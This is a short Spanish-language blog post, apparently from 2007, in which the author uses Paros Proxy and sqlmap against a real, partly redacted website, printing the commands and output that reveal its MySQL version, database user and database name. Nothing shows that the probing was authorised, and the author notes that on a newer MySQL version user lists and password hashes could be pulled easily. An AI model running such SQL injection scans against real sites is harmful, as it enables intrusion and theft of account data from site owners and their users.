Por alguna extraña razon, este post esta marcado como draft… ¿se habra perdido en la migracion? Sea como sea, lo publico aunque sea de… oh dios mio… del 2007??? y ya hacia estas cosas yo???

—————————–

Herramientas:
Paros Proxy
Sqlmap
Tiempo:15 minutos (Por alguna extraña razon la version 5 de sqlmap no queria ir en mi mac, asi que al final use la 4)

Paros

Sqlmap

./sqlmap.py --url="http://www.*******.info/index.php?id=fviewid&v=6" -b

sqlmap/0.4 coded by inquis
and belch

[*] starting at: 13:23:13
[13:33:40] [WARNING] parameter ‘id’ is not injectable
remote DBMS: MySQL < 5.0.0
banner: ’4.1.22-standard-log’
[*] shutting down at: 13:25:39

./sqlmap.py –url=”http://www.*******.info/index.php?id=fviewid&v=6″ –current-user –current-db

sqlmap/0.4 coded by inquis
and belch

[*] starting at: 13:33:34
[13:23:19] [WARNING] parameter ‘id’ is not injectable
remote DBMS: MySQL < 5.0.0
current user: ‘sO2a846O_*******@localhost’
current database: ‘sO2a846O_*******’
[*] shutting down at: 13:34:52

Si usara una version de MySql mas moderna se podria conseguir sin mucha dificultad una lista de users + hashes de passwords entre otras cosas :)
A ver si un dia aprendo a hacer lo mismo en versiones mas antiguas del mysql que aun corren por ahi.

(^o^)